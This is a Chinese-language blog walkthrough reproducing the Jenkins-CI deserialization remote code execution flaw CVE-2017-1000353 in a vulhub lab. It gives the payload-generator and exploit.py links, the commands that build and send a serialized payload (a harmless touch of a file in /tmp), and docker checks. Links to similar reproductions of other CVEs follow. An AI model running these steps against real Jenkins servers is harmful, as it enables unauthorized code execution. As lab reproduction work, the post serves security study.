2. 程式人生 > 實用技巧 >Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)

Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)

阿新 發佈:2020-07-25

0x01 環境

使用vulhub搭建漏洞環境

/vulhub-master/jenkins/CVE-2017-1000353

http://192.168.255.130:8080/

0x02 復現

首先下載CVE-2017-1000353-1.1-SNAPSHOT-all.jar,這是生成POC的工具。

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

執行下面命令,生成位元組碼檔案:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "
 
touch /tmp/CVE-2017-1000353_is_success"

執行上述程式碼後,在當前目錄下生成jenkins_poc.ser檔案,這就是序列化字串。

接著下載exploit.py,https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

【注意】上面連結裡的exploit程式碼需要將Proxies裡面的內容註釋掉,否則會報錯

執行exp

python exploit.py http://192.168.255.130:8080 jenkins_poc.ser

0x03 檢驗

首先檢視環境的CONTAINER ID

sudo docker ps

接著進入容器內部

sudo docker exec -it 容器id bash

檢視/tmp目錄

驗證成功

參考文章:https://blog.csdn.net/JiangBuLiu/article/details/95475293

相關推薦

Jenkins-CI 遠端程式碼執行漏洞復現CVE-2017-1000353

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

F5 BIG-IP 遠端程式碼執行漏洞復現CVE-2020-5902

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Apache Struts 2遠端程式碼執行漏洞復現第三彈

Double Kill 0x00 漏洞概述 編號為CVE-2017-5638。 官方描述是: It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn\'t valid an exception is th

[CVE-2012-0392] Apache Struts 2遠端程式碼執行漏洞復現第五彈

棄之可惜 0x00 漏洞概述 編號為CVE-2012-0392。 即S2-008,實際上是多個漏洞的集合。

Apache Solr 遠端命令執行漏洞復現CVE-2019-0193

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Jackson遠端程式碼執行漏洞復現不使用vluhub,手寫transletBytecodes欄位

今天花了一天的時間復現Jackson遠端程式碼執行漏洞,查詢vulhub可以看到存在CVE-2017-7525的漏洞環境,根據網上的教程,的確可以復現成功。

Apache Struts 2遠端程式碼執行漏洞復現第二彈

即S2-048 0x00 漏洞概述 編號為CVE-2017-9791。 官方描述是: It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it\'s a Struts 1 action

S2-052CVE-2017-9805 遠端程式碼執行漏洞復現

0x01 漏洞說明 漏洞編號:CVE-2017-9805S2-052影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12漏洞詳情:http://struts.apache.org/docs/s2-052.html

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現 漏洞介紹 今日,Oracle官方釋出WebLogic安全更新,其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645),該漏洞通過T3協議進行利用,攻擊者可以實現遠端程式碼執行

Apache Struts 2遠端程式碼執行漏洞復現

沒學會的SSH = Struts2 + Spring + Hibernate Apache Struts 2是一個基於MVC模式的Web應用框架,本質上相當於一個servlet。在MVC設計模式中,Struts 2作為控制器建立模型和檢視的資料互動。

Drupal遠端程式碼執行漏洞復現

最好的CMS之一 0x00 漏洞概述 編號為CVE-2018-7600。 Drupal是用PHP開發的開源內容管理框架CMF,由內容管理系統CMS和PHP開發框架Framework共同組成。

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場 進入環境 Struts2-013好傢伙,框架直接寫臉上,怕人看不出來= =

Spring Cloud Gateway 遠端程式碼執行漏洞復現CVE-2022-22947

漏洞說明 2022年3月1日,VMware官方釋出漏洞報告,在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時,會容易造成程式碼注入攻擊,攻擊者可以製造惡意請求,在遠端主機進行任意遠端執行

Spring Framework遠端程式碼執行漏洞復現(CVE-2022-22965)

1.漏洞描述     漏洞名稱 Spring Framework遠端程式碼執行漏洞 公開時間 2022-03-29 更新時間

Office CVE-2017-8570遠端程式碼執行漏洞復現

CVE-2017-8570漏洞是一個邏輯漏洞,利用方法簡單,影響範圍廣。由於該漏洞和三年前的SandWorm沙蟲漏洞非常類似,因此我們稱之為“沙蟲”二代漏洞

CVE-2022-22947 Spring Cloud Gateway 遠端程式碼執行漏洞復現

一、漏洞概述 2022年3月1日,VMware官方釋出漏洞報告,在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時,會容易造成程式碼注入攻擊,攻擊者可以製造惡意請求,在遠端主機進行任意遠端執行

Apache Dubbo Provider預設反序列漏洞復現CVE-2020-1948

Apache Dubbo Provider預設反序列漏洞CVE-2020-1948 0x01 搭建漏洞環境 漏洞介紹 2020年06月23日, 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告,該漏洞編號為CVE-2020-1948,

Apache Shiro反序列化漏洞復現CVE-2016-4437

0x00 Apache Shiro簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。